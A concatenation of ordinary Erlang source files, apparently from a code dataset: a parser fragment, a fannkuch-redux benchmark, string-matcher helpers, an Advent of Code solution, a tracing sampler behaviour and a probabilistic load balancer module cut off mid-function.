?TOKEN_EXIT_OK(single_quoted, $');
?TOKEN_TAKE_ESCAPED(single_quoted, $');
?TOKEN_TAKE_ESCAPED(single_quoted, $\\);
?ANY_TAKE(single_quoted);
?EOF_EXIT_OK(unquoted);
?TOKEN_EXIT_OK(unquoted, $\s);
?TOKEN_EXIT_OK(unquoted, $\t);
?TOKEN_KEEP_EXIT_OK(unquoted, $\n);
?TPAIR_KEEP_EXIT_OK(unquoted, $\\, $\n);
?TOKEN_KEEP_EXIT_OK(unquoted, $;);
?TOKEN_KEEP_EXIT_OK(unquoted, $]);
?TOKEN_KEEP_EXIT_OK(unquoted, $));
?TOKEN_KEEP_EXIT_OK(unquoted, $>);
?TOKEN_EXIT_ERROR(unquoted, $[, {unexpected, $[});
?TOKEN_EXIT_ERROR(unquoted, $(, {unexpected, $(});
?TOKEN_EXIT_ERROR(unquoted, $<, {unexpected, $<});
?TOKEN_TAKE_ESCAPED(unquoted, $\s);
?TOKEN_TAKE_ESCAPED(unquoted, $\t);
?TOKEN_TAKE_ESCAPED(unquoted, $\\);
?TOKEN_TAKE_ESCAPED(unquoted, $;);
?TOKEN_TAKE_ESCAPED(unquoted, $[);
?TOKEN_TAKE_ESCAPED(unquoted, $]);
?TOKEN_TAKE_ESCAPED(unquoted, $();
?TOKEN_TAKE_ESCAPED(unquoted, $));
?TOKEN_TAKE_ESCAPED(unquoted, $<);
?TOKEN_TAKE_ESCAPED(unquoted, $>);
?ANY_TAKE(unquoted);
?EOF_EXIT_OK(var_unquoted);
?TOKEN_EXIT_OK(var_unquoted, $\s);
?TOKEN_EXIT_OK(var_unquoted, $\t);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $\n);
?TPAIR_KEEP_EXIT_OK(var_unquoted, $\\, $\n);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $;);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $]);
?TOKEN_KEEP_EXIT_OK(var_unquoted, $));
?TOKEN_KEEP_EXIT_OK(var_unquoted, $>);
?TOKEN_EXIT_ERROR(var_unquoted, $[, {unexpected, $[});
?TOKEN_EXIT_ERROR(var_unquoted, $(, {unexpected, $(});
?TOKEN_EXIT_ERROR(var_unquoted, $<, {unexpected, $<});
?TOKEN_TAKE_ESCAPED(var_unquoted, $\s);
?TOKEN_TAKE_ESCAPED(var_unquoted, $\t);
?TOKEN_TAKE_ESCAPED(var_unquoted, $\\);
?TOKEN_TAKE_ESCAPED(var_unquoted, $;);
?TOKEN_TAKE_ESCAPED(var_unquoted, $[);
?TOKEN_TAKE_ESCAPED(var_unquoted, $]);
?TOKEN_TAKE_ESCAPED(var_unquoted, $();
?TOKEN_TAKE_ESCAPED(var_unquoted, $));
?TOKEN_TAKE_ESCAPED(var_unquoted, $<);
?TOKEN_TAKE_ESCAPED(var_unquoted, $>);
?ANY_TAKE(var_unquoted);
?EOF_EXIT_ERROR(var_braced, {expected, $'});
?TOKEN_EXIT_OK(var_braced, $});
?TOKEN_TAKE_DESCEND_FLATTEN(var_braced, ${, braced, $});
?TOKEN_TAKE_ESCAPED(var_braced, ${);
?TOKEN_TAKE_ESCAPED(var_braced, $});
?TOKEN_TAKE_ESCAPED(var_braced, $\\);
?ANY_TAKE(var_braced);
?EOF_EXIT_ERROR(funcall, {expected, $]});
?TOKEN_EXIT_OK(funcall, $]);
?TOKEN_EXIT_ERROR(funcall, $\n, {unimplemented, progcalls});
?TPAIR_DROP(funcall, $\\, $\n);
?TOKEN_DROP(funcall, $\s);
?TOKEN_DROP(funcall, $\t);
?ANY_KEEP_DESCEND(funcall, word);
?EOF_EXIT_ERROR(list, {expected, $)});
?TOKEN_EXIT_OK(list, $));
?TOKEN_EXIT_ERROR(list, $\n, {unimplemented, tables});
?TPAIR_DROP(list, $\\, $\n);
?TOKEN_DROP(list, $\s);
?TOKEN_DROP(list, $\t);
?ANY_KEEP_DESCEND(list, word);
?EOF_EXIT_ERROR(tuple, {expected, $>});
?TOKEN_EXIT_OK(tuple, $>);
?TOKEN_EXIT_ERROR(tuple, $\n, {unimplemented, matrices});
?TPAIR_DROP(tuple, $\\, $\n);
?TOKEN_DROP(tuple, $\s);
?TOKEN_DROP(tuple, $\t);
?ANY_KEEP_DESCEND(tuple, word);
parse(Lvls, Rem, Acc) ->
{error, {unexpected, other}, Lvls, Rem, Acc}.
-spec initpos() -> position().
% @doc Column 0 of row 0 of file `nofile'.
initpos() ->
{nofile,0,0}.
-spec initpos(any()) -> position().
% @doc Column 0 of row 0 of file `File'.
initpos(Filename) ->
{Filename,0,0}.
-spec nextpos(char(), position()) -> position().
% @doc Increments the row and sets the column to 0 for vertical whitespace
% characters; else, increments the column only.
nextpos($\n, {F,L,_}) ->
{F,L+1,0};
nextpos(_, {F,L,C}) ->
{F,L,C+1}.
-spec is_text(str_or_bin()) -> boolean().
% @doc True if character list or binary; false otherwise.
is_text(Txt) ->
is_binary(Txt) or io_lib:char_list(Txt). | src/otpcl_parse.erl | 0.581303 | 0.67539 | otpcl_parse.erl | starcoder |
% The Computer Language Benchmarks Game
% https://salsa.debian.org/benchmarksgame-team/benchmarksgame/
%%
%% Contributed by : <NAME> and <NAME>, 13 Nov 2010
%% erlc fannkuchredux.erl
%% erl -smp enable -noshell -run fannkuchredux main 12
-module(fannkuchredux).
-compile([native, {hipe, [o3]}]).
-export([main/1]).
main([Arg]) ->
main(list_to_integer(Arg)),
halt(0);
main(N) when N > 0 ->
{MaxFlips, Checksum} =
case N of
1 -> {0, 0};
_Other ->
Chunk = fact(N - 1),
divide(0, N, lists:seq(1, N), Chunk),
join(N, 0, 0)
end,
io:format("~p~nPfannkuchen(~p) = ~p~n", [Checksum, N, MaxFlips]),
{MaxFlips, Checksum}.
divide(N, N, _L, _C) -> ok;
divide(N, MaxN, [H|T] = List, Chunk) ->
Self = self(),
Fun = fun() ->
work(N, List, N * Chunk, (N + 1) * Chunk, MaxN, 0, 0, Self)
end,
spawn(Fun),
divide(N + 1, MaxN, T ++ [H], Chunk).
join(0, MaxFlips, Checksum) -> {MaxFlips, Checksum};
join(N, MaxFlips, Checksum) ->
receive
{Flips, Sum} -> join(N - 1, max(MaxFlips, Flips), Checksum + Sum)
end.
work(_P, _L, Index, Index, _R, MaxFlips, Checksum, Target) ->
Target ! {MaxFlips, Checksum};
work(Proc, List, Index, MaxIndex, R, MaxFlips, Checksum, Target) ->
reset(R),
{Flips, Sum} = flip_sum(Index, List),
NewFlips = max(Flips, MaxFlips),
NewSum = Checksum + Sum,
{NewList, NewR} = next(Proc, List, 1),
work(Proc, NewList, Index + 1, MaxIndex, NewR, NewFlips, NewSum, Target).
next(Proc, List, R) ->
NewList = next_aux(R, List),
case put(R, get(R) - 1) of
1 -> next(Proc, NewList, R + 1);
_Other -> {NewList, R}
end.
next_aux(1, [E1, E2|T]) -> [E2, E1|T];
next_aux(2, [E1, E2, E3|T]) -> [E2, E3, E1|T];
next_aux(3, [E1, E2, E3, E4|T]) -> [E2, E3, E4, E1|T];
next_aux(R, [H|T]) ->
{Front, Back} = lists:split(R, T),
Front ++ [H] ++ Back.
flip_sum(Index, List) ->
Flips = flip(List, 0),
Sum =
case Index band 1 of
0 -> Flips;
1 -> -Flips
end,
{Flips, Sum}.
flip([1|_T], N) ->
N;
flip([2, E1|T], N) ->
flip([E1, 2|T], N + 1);
flip([3, E1, E2|T], N) ->
flip([E2, E1, 3|T], N + 1);
flip([4, E1, E2, E3|T], N) ->
flip([E3, E2, E1, 4|T], N + 1);
flip([5, E1, E2, E3, E4|T], N) ->
flip([E4, E3, E2, E1, 5|T], N + 1);
flip([6, E1, E2, E3, E4, E5|T], N) ->
flip([E5, E4, E3, E2, E1, 6|T], N + 1);
flip([7, E1, E2, E3, E4, E5, E6|T], N) ->
flip([E6, E5, E4, E3, E2, E1, 7|T], N + 1);
flip([8, E1, E2, E3, E4, E5, E6, E7|T], N) ->
flip([E7, E6, E5, E4, E3, E2, E1, 8|T], N + 1);
flip([9, E1, E2, E3, E4, E5, E6, E7, E8|T], N) ->
flip([E8, E7, E6, E5, E4, E3, E2, E1, 9|T], N + 1);
flip([10, E1, E2, E3, E4, E5, E6, E7, E8, E9|T], N) ->
flip([E9, E8, E7, E6, E5, E4, E3, E2, E1, 10|T], N + 1);
flip([11, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10|T], N) ->
flip([E10, E9, E8, E7, E6, E5, E4, E3, E2, E1, 11|T], N + 1);
flip([12, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10, E11|T], N) ->
flip([E11, E10, E9, E8, E7, E6, E5, E4, E3, E2, E1, 12|T], N + 1);
flip([H|_T] = List, N) ->
{First, Last} = lists:split(H, List),
flip(lists:reverse(First) ++ Last, N + 1).
reset(1) -> ok;
reset(N) -> put(N - 1, N), reset(N - 1).
fact(1) -> 1;
fact(N) -> N * fact(N - 1). | bench/fannkuchredux.erl | 0.525612 | 0.558267 | fannkuchredux.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_strings).
-include("porkrind_internal.hrl").
% For string matchers, the args determine if the expect value
% should be a binary or list. I.e., if the arg is a binary
% then the value being matched must also be a binary.
-export([
has_length/1,
contains_string/1,
starts_with/1,
ends_with/1,
equal_to_string/1,
equal_ignoring_case/1,
equal_ignoring_whitespace/1,
matches_re/1,
matches_re/2,
string_contains_in_order/1
]).
has_length(Length) when is_integer(Length), Length >= 0 ->
#'porkrind.matcher'{
name = has_length,
args = [Length],
match = fun(Value0) ->
String = to_binary(Value0),
case size(String) of
Length ->
ok;
Mismatch ->
?PR_FAIL({mismatch, Value0, Mismatch})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({mismatch, Value, Mismatch}) ->
Args = [Value, Mismatch, Length],
io_lib:format("~p has length ~b, not ~b", Args)
end
}.
contains_string(Pattern0) ->
Pattern = pattern_to_binary(Pattern0),
#'porkrind.matcher'{
name = contains_string,
args = [Pattern0],
match = fun(Value0) ->
Value = to_binary(Value0),
case binary:match(Value, Pattern) of
{_Pos, _Len} ->
ok;
nomatch ->
?PR_FAIL({nomatch, Value0})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not contain ~p", [Value, Pattern0])
end
}.
starts_with(Pattern0) ->
Pattern = pattern_to_binary(Pattern0),
#'porkrind.matcher'{
name = starts_with,
args = [Pattern0],
match = fun(Value0) ->
Value = to_binary(Value0),
case binary:longest_common_prefix([Value, Pattern]) of
Length when Length == size(Pattern) ->
ok;
_ ->
?PR_FAIL({nomatch, Value0})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not start with ~p", [Value, Pattern0])
end
}.
ends_with(Pattern0) ->
Pattern = pattern_to_binary(Pattern0),
#'porkrind.matcher'{
name = ends_with,
args = [Pattern0],
match = fun(Value0) ->
Value = to_binary(Value0),
case binary:longest_common_suffix([Value, Pattern]) of
Length when Length == size(Pattern) ->
ok;
_ ->
?PR_FAIL({nomatch, Value0})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not end with ~p", [Value, Pattern0])
end
}.
equal_to_string(String0) ->
String = to_binary(String0),
#'porkrind.matcher'{
name = equal_to_string,
args = [String0],
match = fun(Value0) ->
Value = to_binary(Value0),
if Value == String -> ok; true ->
?PR_FAIL({nomatch, Value0})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not equal ~p", [Value, String0])
end
}.
equal_ignoring_case(Pattern0) ->
Pattern = to_lower(pattern_to_binary(Pattern0)),
#'porkrind.matcher'{
name = equal_ignoring_case,
args = [Pattern0],
match = fun(Value0) ->
Value = to_lower(to_binary(Value0)),
case Value == Pattern of
true ->
ok;
false ->
?PR_FAIL({nomatch, Value})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not equal ~p", [Value, Pattern])
end
}.
equal_ignoring_whitespace(Pattern0) ->
Pattern = strip_whitespace(pattern_to_binary(Pattern0)),
#'porkrind.matcher'{
name = equal_ignoring_whitespace,
args = [Pattern0],
match = fun(Value0) ->
Value = strip_whitespace(to_binary(Value0)),
case Value == Pattern of
true ->
ok;
false ->
?PR_FAIL({nomatch, Value})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
io_lib:format("~p does not equal ~p", [Value, Pattern])
end
}.
matches_re(Pattern) ->
matches_re(Pattern, []).
matches_re(Pattern0, Opts) when is_list(Opts) ->
% Compile ahead of time so that errors in the regexp
% are noted before the test runs.
Pattern = pattern_to_binary(Pattern0),
CompileOpts = compile_opts(Opts),
RunOpts = run_opts(Opts),
{ok, MP} = re:compile(Pattern, CompileOpts),
#'porkrind.matcher'{
name = matches_re,
args = [Pattern0, Opts],
match = fun(Value0) ->
Value = to_binary(Value0),
case re:run(Value, MP, RunOpts) of
{match, _} ->
ok;
match ->
ok;
_ ->
?PR_FAIL({nomatch, Value0})
end
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value}) ->
Args = [Value, Pattern, opts_to_string(Opts)],
io_lib:format("~p does not match ~p~s", Args)
end
}.
string_contains_in_order(Patterns0) when is_list(Patterns0) ->
Patterns = lists:map(fun(P) ->
pattern_to_binary(P)
end, Patterns0),
#'porkrind.matcher'{
name = contains_in_order,
args = [Patterns0],
match = fun(Value0) ->
Value = to_binary(Value0),
lists:foldl(fun(P, {S, L}) ->
case binary:match(Value, P, [{scope, {S, L}}]) of
{PS, PL} ->
{PS + PL, size(Value) - PS - PL};
nomatch ->
Tail = binary:part(Value, {S, L}),
?PR_FAIL({nomatch, Tail, P})
end
end, {0, size(Value)}, Patterns)
end,
reason = fun
({bad_type, Value}) ->
io_lib:format("~p is not a string", [Value]);
({nomatch, Value, Pattern}) ->
io_lib:format("~p does not match ~p", [Value, Pattern])
end
}.
to_binary(String) ->
try iolist_to_binary(String) of
Bin when is_binary(Bin) ->
Bin;
_ ->
?PR_FAIL({bad_type, String})
catch _:_ ->
?PR_FAIL({bad_type, String})
end.
pattern_to_binary(String) ->
try
to_binary(String)
catch _:_ ->
erlang:error({badarg, String})
end.
to_lower(Binary) ->
to_lower(binary_to_list(Binary), []).
to_lower([], Acc) ->
list_to_binary(lists:reverse(Acc));
to_lower([C | Rest], Acc) when C >= $A, C =< $Z ->
to_lower(Rest, [(C - $A + $a) | Acc]);
to_lower([C | Rest], Acc) ->
to_lower(Rest, [C | Acc]).
strip_whitespace(Binary) ->
strip_whitespace(binary_to_list(Binary), []).
strip_whitespace([], Acc) ->
list_to_binary(lists:reverse(Acc));
strip_whitespace([C | Rest], Acc)
when C == $\n; C == $\t; C == $\r; C == $\s ->
strip_whitespace(Rest, Acc);
strip_whitespace([C | Rest], Acc) ->
strip_whitespace(Rest, [C | Acc]).
opts_to_string([]) ->
"";
opts_to_string(Opts) ->
io_lib:format(" with options: ~p", [Opts]).
compile_opts(Opts) ->
filter_opts(Opts, compile_opt_names()).
run_opts(Opts) ->
filter_opts(Opts, run_opt_names()).
filter_opts([], _Allowed) ->
[];
filter_opts([Opt | Rest], Allowed) ->
OptName = case Opt of
{Name, _} -> Name;
{Name, _, _} -> Name;
_ -> Opt
end,
case lists:member(OptName, Allowed) of
true -> [Opt | filter_opts(Rest, Allowed)];
false -> filter_opts(Rest, Allowed)
end.
compile_opt_names() ->
[
unicode,
anchored,
caseless,
dollar_endonly,
dotall,
extended,
firstline,
multiline,
no_auto_capture,
dupnames,
ungreedy,
newline,
bsr_anycrlf,
bsr_unicode,
no_start_optimize,
ucp,
never_utf
].
run_opt_names() ->
[
anchored,
capture,
global,
match_limit,
match_limit_recursion,
newline,
notbol,
notempty,
notempty_atstart,
noteol,
offset,
report_errors
]. | src/porkrind_strings.erl | 0.686055 | 0.485722 | porkrind_strings.erl | starcoder |
-module(day3).
-behaviour(aoc).
-include_lib("eunit/include/eunit.hrl").
-type bit() :: 0..1.
-type report() :: [[bit(), ...], ...].
-export([run/1]).
-spec run(argparse:part()) -> ok.
run(Part) ->
Report = read_report(),
case Part of
1 -> part1(Report);
2 -> part2(Report)
end.
-spec part1(report()) -> ok.
part1(Report) ->
GammaRate = most_common_bits(Report),
EpsilonRate = [Bit bxor 1 || Bit <- GammaRate],
GammaRateDecimal = bits_to_integer(GammaRate),
EpsilonRateDecimal = bits_to_integer(EpsilonRate),
io:format("Gamma rate bits: ~p~n", [GammaRate]),
io:format("Gamma rate decimal: ~p~n", [GammaRateDecimal]),
io:format("Epsilon rate bits: ~p~n", [EpsilonRate]),
io:format("Epsilon rate decimal: ~p~n", [bits_to_integer(EpsilonRate)]),
io:format("Product: ~p~n", [GammaRateDecimal * EpsilonRateDecimal]).
-spec part2(report()) -> ok.
part2(Report) ->
OxygenRating = rating_filter(oxygen, Report),
OxygenRatingDecimal = bits_to_integer(OxygenRating),
C02Rating = rating_filter(c02, Report),
C02RatingDecimal = bits_to_integer(C02Rating),
io:format("Oxygen generator rating: ~p~n", [OxygenRating]),
io:format("Oxygen generator rating decimal: ~p~n", [OxygenRatingDecimal]),
io:format("C02 generator rating: ~p~n", [C02Rating]),
io:format("C02 generator rating decimal: ~p~n", [C02RatingDecimal]),
io:format("Product: ~p~n", [OxygenRatingDecimal * C02RatingDecimal]).
-spec most_common_bits(report()) -> [bit()].
most_common_bits(Report) ->
NbrPositions = length(hd(Report)),
lists:foldl(
fun(Position, GammaRateAcc) ->
BitsInPosition = [lists:nth(Position, X) || X <- Report],
[most_common_bit(BitsInPosition) | GammaRateAcc]
end,
[],
lists:seq(NbrPositions, 1, -1)
).
most_common_bits_test() ->
?assertEqual([1, 0, 1, 1, 0], most_common_bits(example_report())).
-spec rating_filter(oxygen | c02, report()) -> [bit()].
rating_filter(Type, Report) ->
NbrPositions = length(hd(Report)),
Rating =
catch lists:foldl(
fun
(_Position, [ValidNumber | []]) ->
throw(ValidNumber);
(Position, ValidNumbers) ->
BitsInPosition = [lists:nth(Position, X) || X <- ValidNumbers],
MostCommonBit = most_common_bit(BitsInPosition),
MatchingBit =
case Type of
oxygen -> MostCommonBit;
c02 -> 1 bxor MostCommonBit
end,
lists:filtermap(
fun
({Bit, Number}) when Bit == MatchingBit ->
{true, Number};
({_, _}) ->
false
end,
lists:zip(BitsInPosition, ValidNumbers)
)
end,
Report,
lists:seq(1, NbrPositions)
),
lists:flatten(Rating).
oxygen_generator_rating_filter_test() ->
?assertEqual(
[1, 0, 1, 1, 1],
rating_filter(oxygen, example_report())
).
co2_scrubber_rator_rating_filter_test() ->
?assertEqual(
[0, 1, 0, 1, 0],
rating_filter(c02, example_report())
).
-spec most_common_bit([bit()]) -> bit().
most_common_bit(Bits) -> round(average(Bits)).
-spec average([bit()]) -> float().
average(Bits) -> lists:sum(Bits) / length(Bits).
average_test() -> ?assertEqual(0.5, average([0, 1])).
-spec bits_to_integer([bit()]) -> integer().
bits_to_integer(Bits) ->
StartPow = math:pow(2, length(Bits) - 1),
{Integer, _LastPow} = lists:foldl(
fun(B, {Sum, Pow}) ->
{Sum + B * Pow, Pow / 2}
end,
{0, StartPow},
Bits
),
round(Integer).
bits_to_integer_test() -> ?assertEqual(3, bits_to_integer([0, 0, 1, 1])).
-spec example_report() -> report().
example_report() ->
[
[0, 0, 1, 0, 0],
[1, 1, 1, 1, 0],
[1, 0, 1, 1, 0],
[1, 0, 1, 1, 1],
[1, 0, 1, 0, 1],
[0, 1, 1, 1, 1],
[0, 0, 1, 1, 1],
[1, 1, 1, 0, 0],
[1, 0, 0, 0, 0],
[1, 1, 0, 0, 1],
[0, 0, 0, 1, 0],
[0, 1, 0, 1, 0]
].
-spec read_report() -> report().
read_report() ->
{ok, Binary} = file:read_file("input/day3"),
Rows = string:lexemes(binary_to_list(Binary), "\n"),
lists:map(fun string_to_report/1, Rows).
-spec string_to_report(string()) -> [bit()].
string_to_report(String) -> [S - $0 || S <- String]. | src/day3.erl | 0.563738 | 0.741651 | day3.erl | starcoder |
%% @copyright 2017 <NAME> <<EMAIL>>
%%
%% @doc Span Sampler.
%%
%% Note that this component has not been described in the
%% <a href="https://github.com/opentracing/specification/blob/1.1/specification.md">OpenTracing Specification</a>.
%%
%% === Callbacks ===
%%
%% This module requires following callback:
%%
%% ```
%% %% @doc Determines to sample the next span which has the given name and tags.
%% -callback is_sampled(state(), passage:operation_name(), passage:tags()) -> boolean().
%% '''
-module(passage_sampler).
%%------------------------------------------------------------------------------
%% Exported API
%%------------------------------------------------------------------------------
-export([new/2]).
-export([is_sampler/1]).
-export([get_module/1]).
-export([get_state/1]).
-export([is_sampled/3]).
-export_type([sampler/0]).
-export_tyep([state/0]).
%%------------------------------------------------------------------------------
%% Callback API
%%------------------------------------------------------------------------------
-callback is_sampled(state(), passage:operation_name(), passage:tags()) -> boolean().
%%------------------------------------------------------------------------------
%% Macros and Records
%%------------------------------------------------------------------------------
-define(SAMPLER, ?MODULE).
-record(?SAMPLER,
{
module :: module(),
state :: state()
}).
%%------------------------------------------------------------------------------
%% Exported Types
%%------------------------------------------------------------------------------
-opaque sampler() :: #?SAMPLER{}.
%% Sampler.
-type state() :: term().
%% Implementation-dependent state.
%%------------------------------------------------------------------------------
%% Exported Functions
%%------------------------------------------------------------------------------
%% @doc Makes a new sampler.
%%
%% Note that `Module' must be a implementation module of `passage_sampler' behaviour.
-spec new(module(), state()) -> sampler().
new(Module, State) ->
#?SAMPLER{module = Module, state = State}.
%% @doc Returns `true' if `X' is a sampler, otherwise `false'.
-spec is_sampler(sampler() | term()) -> boolean().
is_sampler(X) ->
is_record(X, ?SAMPLER).
%% @doc Returns the module of `Sampler'.
-spec get_module(sampler()) -> module().
get_module(Sampler) ->
Sampler#?SAMPLER.module.
%% @doc Returns the state of `Sampler'.
-spec get_state(sampler()) -> state().
get_state(Sampler) ->
Sampler#?SAMPLER.state.
%% @doc Determines to sample the next span which has the given name and tags.
-spec is_sampled(sampler(), passage:operation_name(), passage:tags()) -> boolean().
is_sampled(#?SAMPLER{module = Module, state = State}, Name, Tags) ->
Module:is_sampled(State, Name, Tags). | src/passage_sampler.erl | 0.617859 | 0.439868 | passage_sampler.erl | starcoder |
%% @doc
%% Probabilistic Load Balancer. Schedules function
%% execution on a node selected with randomised weighted
%% sampling. Used credit-based approach for implementing
%% backpressure: when a node did not provide credit, no
%% call/cast to that node is allowed.
%%
%% Capacity discovery: plb subscribes to module via local
%% broker, and issues "buy" order when needed.
%%
%% @end
-module(lambda_plb).
-author("<EMAIL>").
%% API
-export([
start_link/3,
cast/4,
call/4,
capacity/1,
meta/1,
%% internal API for broker
complete_order/2
]).
-behaviour(gen_server).
%% gen_server callbacks
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2
]).
%% Internal exports for testing
-export([
take/2
]).
%% Options for this plb (module).
-type options() :: #{
%% capacity to request from all servers combined
capacity := non_neg_integer(),
%% version or version range to accept
vsn => integer(),
%% local broker process (lambda_broker by default)
broker => lambda:dst(),
%% disable automatic meta query/compilation
compile => false
}.
-export_type([options/0]).
-include_lib("kernel/include/logger.hrl").
%%--------------------------------------------------------------------
%% @doc
%% Starts the server and links it to calling process.
-spec start_link(lambda:dst(), module(), options()) -> {ok, pid()} | {error, {already_started, pid()}}.
start_link(Broker, Module, Options) when is_atom(Module) ->
gen_server:start_link({local, Module}, ?MODULE, {Broker, Module, Options}, []).
%%--------------------------------------------------------------------
%% API
%% @doc Starts a request on a node selected with weighted random
%% sampling. May block if no capacity left.
%% Returns {error, suspend} if 'nosuspend' requested, but no capacity left.
-spec cast(module(), atom(), [term()], nosuspend | timeout()) -> ok | {error, suspend}.
cast(M, F, A, Timeout) ->
case gen_server:call(M, token, infinity) of
{suspend, _Queue} when Timeout =:= nosuspend ->
{error, suspend};
{suspend, Queue} ->
gen_server:call(Queue, wait, Timeout),
cast(M, F, A, Timeout);
To ->
erpc:cast(node(To), lambda_channel, handle, [To, M, F, A])
end.
%% @doc Call executed on a node which is selected with weighted random
%% sampling. Returns {error, suspend} if 'nosuspend' requested, but no capacity left.
-spec call(module(), atom(), [term()], nosuspend | timeout()) -> term() | {error, suspend}.
call(M, F, A, Timeout) ->
case gen_server:call(M, token, infinity) of
{suspend, _Queue} when Timeout =:= nosuspend ->
{error, suspend};
{suspend, Queue} ->
gen_server:call(Queue, wait, Timeout),
call(M, F, A, Timeout);
To ->
Rid = erpc:send_request(node(To), lambda_channel, handle, [To, M, F, A]),
case erpc:wait_response(Rid, infinity) of
{response, Res} ->
Res;
no_response ->
exit(timeout)
end
end.
%% @doc Returns current capacity.
-spec capacity(module()) -> non_neg_integer().
capacity(Module) ->
gen_server:call(Module, capacity).
%% @doc Waits until PLB discovers the module, compiles proxy module and
%% returns meta information.
-spec meta(atom() | pid()) -> module().
meta(Srv) ->
gen_server:call(Srv, meta, infinity).
%% @doc Invoked by a broker, when order has been completed
-spec complete_order(lambda:dst(), [{pid(), Quantity :: pos_integer(), Meta :: lambda:meta()}]) -> ok.
complete_order(Srv, Servers) ->
erlang:send(Srv, {complete_order, Servers}, []).
%%--------------------------------------------------------------------
%% Weighted random sampling: each server process has a weight.
%% Fast selection implemented with Ryabko array, also known as Fenwick
%% trees or bit-indexed tree.
%% Since Erlang does not have a notion of mutable array, and tuples
%% are very slow to modify, process dictionary is used for Ryabko
%% array.
%% Array is zero-indexed for faster 'select' query. Example, in
%% process dictionary, for an array of [13, 9, 10, 5] is:
%% {0, 13}, {1, 22}, {2, 10}, {3, 37}
%%
%% Alternative implementation with faster insert/remove operation
%% can be done with augmented binary tree, analogous to gb_tree,
%% but with added left/right capacity.
-record(lambda_plb_state, {
%% remember module name for event handler
module :: module(),
%% meta: meta-information about currently loaded module. When 'false',
%% meta is not relevant, and no automatic compilation happens,
%% when a list of {pid, ref} - list of processes waiting for PLB to
%% receive meta
meta :: false | [{pid(), reference()}] | lambda:meta(),
%% current capacity, needed for quick reject logic
capacity = 0 :: non_neg_integer(),
%% high/low capacity watermarks
high :: pos_integer(),
%% connected servers, maps pid to an index & expected capacity
pid_to_index = #{} :: #{pid() => {Index :: non_neg_integer(), Capacity :: non_neg_integer()}},
%% connected servers, maps index to pid
%% it could be faster to use process dictionary for
%% this as well, but to prove it, better performance
%% testing framework is needed
index_to_pid = {undefined} :: tuple(),
%% index_to_pid tuple size can be cached, proven that
%% it makes performance better
%% size = 1 :: pos_integer(),
%% list of free indices, for amortised O(1) insertion
free = [0] :: [non_neg_integer()],
%% queue: process that accepts 'wait' requests
queue :: pid(),
%% local broker, monitored for failover purposes
broker :: lambda:dst()
}).
-type state() :: #lambda_plb_state{}.
-spec init({lambda:dst(), Module :: atom(), Options :: options()}) -> {ok, state()}.
init({Broker, Module, #{capacity := HW} = Options}) ->
%% initial array contains a single zero element with zero weight
put(0, 0),
%% monitor the broker (and reconnect if it restarts)
erlang:monitor(process, Broker),
?LOG_DEBUG("requesting ~b ~s from ~p", [HW, Module, Broker], #{domain => [lambda]}),
%% not planning to cancel the order
OrderOpts = #{module => maps:with([vsn], Options)},
_ = lambda_broker:buy(Broker, Module, HW, OrderOpts),
{ok, #lambda_plb_state{module = Module,
queue = proc_lib:spawn_link(fun queue/0),
meta = maps:get(compile, Options, []),
broker = Broker,
high = HW}}.
handle_call(token, _From, #lambda_plb_state{capacity = 0, queue = Queue} = State) ->
% ?LOG_DEBUG("~p: no capacity: sending to queue ~p", [_From, Queue], #{domain => [lambda]}),
{reply, {suspend, Queue}, State};
handle_call(token, _From, #lambda_plb_state{capacity = Cap, index_to_pid = Itp} = State) ->
Idx = take(rand:uniform(Cap) - 1, tuple_size(Itp)),
To = element(Idx + 1, Itp),
Cap =:= 1 andalso begin State#lambda_plb_state.queue ! block end,
% ?LOG_DEBUG("~p: giving token ~p", [_From, To], #{domain => [lambda]}),
{reply, To, State#lambda_plb_state{capacity = Cap - 1}};
handle_call(meta, From, #lambda_plb_state{meta = Waiting} = State) when is_list(Waiting) ->
%% Do not add any code that can block here
{noreply, State#lambda_plb_state{meta = [From | Waiting]}};
handle_call(meta, _From, #lambda_plb_state{meta = Meta} = State) ->
{reply, Meta, State};
handle_call(capacity, _From, #lambda_plb_state{capacity = Cap} = State) ->
{reply, Cap, State}.
handle_cast(_Cast, _State) ->
error(badarg).
%% Handles demand from the server.
%% If it's the first time demand, start monitoring this server.
handle_info({demand, Demand, Server}, #lambda_plb_state{pid_to_index = Pti, index_to_pid = Itp,
capacity = Cap} = State) ->
%%
ServerCount = tuple_size(Itp),
%%
?LOG_DEBUG("received demand (~b) from ~p", [Demand, Server], #{domain => [lambda]}),
%% unblock the queue
Cap =:= 0 andalso begin State#lambda_plb_state.queue ! unblock end,
%%
case maps:find(Server, Pti) of
{ok, {Index, _OldDemand}} ->
%% TODO: when old and new demands are different, start capacity search
inc(Index, Demand, ServerCount),
{noreply, State#lambda_plb_state{capacity = Cap + Demand}};
error ->
erlang:monitor(process, Server),
case State#lambda_plb_state.free of
[Free] ->
%% reached maximum size: double the array size
Extend = ServerCount * 2,
%% create a list of new free cells
NewFree = lists:seq(ServerCount, Extend - 1),
